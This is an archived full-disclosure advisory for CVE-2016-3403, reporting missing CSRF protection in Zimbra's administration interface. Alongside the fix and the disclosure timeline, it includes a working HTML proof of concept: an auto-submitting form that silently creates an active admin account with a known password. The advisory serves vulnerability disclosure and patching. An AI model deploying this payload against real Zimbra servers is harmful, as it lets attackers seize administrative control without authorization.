lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <cf184207-ba87-9bd0-d1f9-d654f4cdc18e@sysdream.com>
Date: Wed, 11 Jan 2017 15:10:02 +0100
From: Sysdream Labs <labs@...dream.com>
To: oss-security@...ts.openwall.com
Cc: fulldisclosure@...lists.org
Subject: [FD] [CVE-2016-3403] [Zimbra] Multiple CSRF in Administration
 interface - all versions

# CVE-2016-3403: Multiple CSRF in Zimbra Administration interface

## Description

Multiple CSRF vulnerabilities have been found in the administration
interface of Zimbra, giving possibilities like adding, modifying and
removing admin accounts.

## Vulnerability

Every forms in the Administration part of Zimbra are vulnerable to CSRF
because of the lack of a CSRF token identifying a valid session. As a
consequence, requests can be forged and played arbitrarily.

**Access Vector**:   remote
**Security Risk**:   low
**Vulnerability**:   CWE-352
**CVSS Base score**: 5.8

## Proof of Concept

```html
<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest"
method="POST">
    <input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/><session xmlns=""
id="1337"/><format xmlns=""
type="js"/></context></soap:Header><soap:Body><CreateAccountRequest
xmlns="urn:zimbraAdmin"><name xmlns="">itworks@...ntu.fr</name><password
xmlns="">test1234</password><a xmlns=""
n="zimbraAccountStatus">active</a><a xmlns=""
n="displayName">ItWorks</a><a xmlns="" n'

        value='"sn">itworks</a><a xmlns=""
n="zimbraIsAdminAccount">TRUE</a></CreateAccountRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```

## Solution

  * Upgrade to version 8.7

## Affected versions

 * All versions previous to 8.7

## Fixes

 * https://bugzilla.zimbra.com/show_bug.cgi?id=100885
 * https://bugzilla.zimbra.com/show_bug.cgi?id=100899

## Timeline (dd/mm/yyyy)

 * 24/02/2016: Issue reported to Zimbra
 * 24/02/2016: Issue aknwoledged
 * 20/06/2016: complete fixes released with version 8.7

## Credits

 * Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail
-dot- fr)
 * Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)
 
 



Download attachment "signature.asc" of type "application/pgp-signature" (820 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ